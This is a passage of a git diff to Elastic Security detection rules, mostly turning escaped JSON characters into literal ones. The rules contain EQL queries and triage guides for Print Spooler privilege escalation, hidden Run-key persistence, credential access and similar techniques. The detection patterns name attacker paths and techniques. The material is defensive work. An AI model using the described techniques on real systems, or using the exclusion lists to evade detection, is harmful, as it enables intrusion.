Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" 
@@ -68,7 +68,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_108.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_108.json
index 8a3bb012775..be5b2d77f9a 100644
--- a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_108.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Print Spooler SPL File Created", - "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" 
@@ -68,7 +68,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_104.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_104.json
index cb0708811ea..259f9b6fa15 100644
--- a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_104.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_105.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_105.json
index b8a3fc4b556..9b1e0399c19 100644
--- a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_105.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_106.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_106.json
index 2b02f7714b7..65805f74169 100644
--- a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_106.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_107.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_107.json
index cc307099bdc..a4f368cf02f 100644
--- a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_107.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_1.json
index 9d440ead0f5..aec1a5a59a3 100644
--- a/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_1.json
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_2.json
index 7dcaeff60ad..083a4a16e6b 100644
--- a/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_2.json
@@ -96,7 +96,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_1.json b/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_1.json
index 86b389c4612..5009122ebc0 100644
--- a/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_101.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_101.json
index cac27ffb1b6..f624b758b16 100644
--- a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_101.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_102.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_102.json
index 0ee1df0ef5b..6d16e1b0668 100644
--- a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_203.json b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_203.json
index a7ecf24fafa..e0f5076b4d2 100644
--- a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_203.json
+++ b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_203.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_204.json b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_204.json
index 2acc4e34297..89ccf216630 100644
--- a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_204.json
+++ b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_204.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_205.json b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_205.json
index 04f6349c88e..29a144eb66c 100644
--- a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_205.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_102.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_102.json
index 97b87e544f8..a7bad66b1d7 100644
--- a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_102.json
@@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", "note": "", - "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) \u003e 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n 